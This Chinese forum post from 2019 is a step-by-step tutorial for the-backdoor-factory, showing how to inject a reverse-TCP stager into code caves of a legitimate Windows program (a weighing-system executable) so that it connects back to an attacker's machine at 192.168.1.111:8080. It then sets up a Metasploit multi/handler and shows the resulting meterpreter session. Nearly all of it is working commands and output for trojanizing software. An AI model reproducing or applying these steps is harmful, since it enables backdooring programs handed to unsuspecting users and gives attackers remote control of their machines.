小黄人 发表于 2019-7-31 21:06:14

工具介绍-the-backdoor-factory

原理
可执行二进制文件中有大量的 00 字节，这些 00 不包含任何数据；将这些空间替换成 payload，并在程序执行时 jmp 到该代码段，从而触发 payload。以项目中的过磅系统为例：


root@John:~/Desktop# git clone https://github.com/secretsquirrel/the-backdoor-factory.git
//克隆并安装 the-backdoor-factory


https://blobscdn.gitbook.com/v0/b/gitbook-28427.appspot.com/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJwqnlYRh7H5h-1bIk%2Fbaa5f2ef8bc4b8332d377e179c2897d1.jpg?generation=1551060452382777&alt=media






root@John:~/Desktop/the-backdoor-factory# ./backdoor.py -f ~/demo/guobang.exe -S
//检测该文件是否支持后门植入


https://blobscdn.gitbook.com/v0/b/gitbook-28427.appspot.com/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJwqnnxPf0wWxDOnLf%2F65f5db4ee779eaacdff8a20bdfd35ea8.jpg?generation=1551060446680834&alt=media






root@John:~/Desktop/the-backdoor-factory# ./backdoor.py -f ~/demo/guobang.exe -c -l 150
//测试是否存在 size 为 150 的裂缝（code cave）空间


https://blobscdn.gitbook.com/v0/b/gitbook-28427.appspot.com/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJwqnpUH0ApLUgJIe7%2F2b8e42c3fe1195f37bf7b01fb31af21b.jpg?generation=1551060438052523&alt=media






root@John:~/Desktop/the-backdoor-factory# ./backdoor.py -f ~/demo/guobang.exe -s show
//查看可用payload


https://blobscdn.gitbook.com/v0/b/gitbook-28427.appspot.com/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJwqnrdey7Kfb796h2%2Fc576aabd967bcbbf39467dcf40ec2759.jpg?generation=1551060449053503&alt=media






root@John:~/Desktop/the-backdoor-factory# ./backdoor.py -f ~/demo/guobang.exe -H 192.168.1.111 -P 8080 -s iat_reverse_tcp_stager_threaded
//插入 payload，并生成植入后的文件。


https://blobscdn.gitbook.com/v0/b/gitbook-28427.appspot.com/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJwqntGvelhg1wyy0N%2F1dbc7c753b5135a67db8ac3bee6f3352.jpg?generation=1551060428696462&alt=media






root@John:~/Desktop/the-backdoor-factory# md5sum ./guobang.exe /root/demo/guobang.exe
//对比原文件与生成文件的 MD5 值


https://blobscdn.gitbook.com/v0/b/gitbook-28427.appspot.com/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJwqnv6TkhNpnFTwb9%2F999c8d02e798b61f61a4d8cd284ffd0b.jpg?generation=1551060459847276&alt=media






root@John:~/Desktop/the-backdoor-factory# du -k ./guobang.exe /root/demo/guobang.exe
//对比文件大小


https://blobscdn.gitbook.com/v0/b/gitbook-28427.appspot.com/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJwqnxzQX0sIVWLXIz%2Fedd13750f6b3e03121e63e805b4a5b97.jpg?generation=1551060427458627&alt=media






msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.1.111
lhost => 192.168.1.111
msf exploit(handler) > set lport 8080
lport => 8080
msf exploit(handler) > exploit -j
//开启本地监听


https://blobscdn.gitbook.com/v0/b/gitbook-28427.appspot.com/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJwqnzy9cnLFdBVB1e%2F94330fb03737c7e42549f1b9b3a8bb21.jpg?generation=1551060430698791&alt=media




//打开软件
https://firebasestorage.googleapis.com/v0/b/gitbook-28427.appspot.com/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJwqo05ZzWWs26q4qv%2F2139e4a1c0c1e326605cf246742ff3a5.jpg?generation=1551060429432002&alt=media

meterpreter > getuid
Server username: John-PC\John


